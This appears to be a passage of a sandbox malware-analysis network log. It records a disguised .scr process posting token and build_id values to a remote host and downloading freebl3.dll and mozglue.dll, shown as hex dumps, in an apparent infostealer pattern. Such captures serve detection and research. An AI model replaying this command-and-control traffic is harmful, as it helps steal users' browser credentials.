2024-11-01 19:58:20 UTC	9070	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 30 31 54 31 39 3a 35 38 3a 31 38 2e 38 33 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 62 33 66 64 34 37 34 2d 38 36 39 30 2d 34 30 30 38 2d 39 64 65 35 2d 64 62 37 37 32 66 35 64 39 66 33 30 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 33 39 34 30 39 32 34 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-01T19:58:18.839Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"fb3fd474-8690-4008-9de5-db772f5d9f30","epoch":"3439409244"},"app":{"locale

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.11.20	58983	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:21 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 653 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:21 UTC	653	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 46 49 44 42 4b 45 42 46 43 42 46 49 49 49 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------FHCAFIDBKEBFCBFIIIIIContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------FHCAFIDBKEBFCBFIIIIIContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------FHCAFIDBKEBFCBFIIIIICont
2024-11-01 19:58:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.11.20	58984	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:22 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:22 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------CGHCFBAAAFHJDGCBFIIJCont
2024-11-01 19:58:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:22 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.11.20	58985	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:23 UTC	242	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:24 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:23 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Friday, 01-Nov-2024 19:58:23 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:58:24 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 Data Ascii: eUeLXee0@eeeue0UEeeUeee $
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
2024-11-01 19:58:24 UTC	16384	IN	Data Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.11.20	58986	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:25 UTC	242	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:26 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:25 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Friday, 01-Nov-2024 19:58:25 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:58:26 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPF
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-11-01 19:58:26 UTC	16384	IN	Data Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc Data 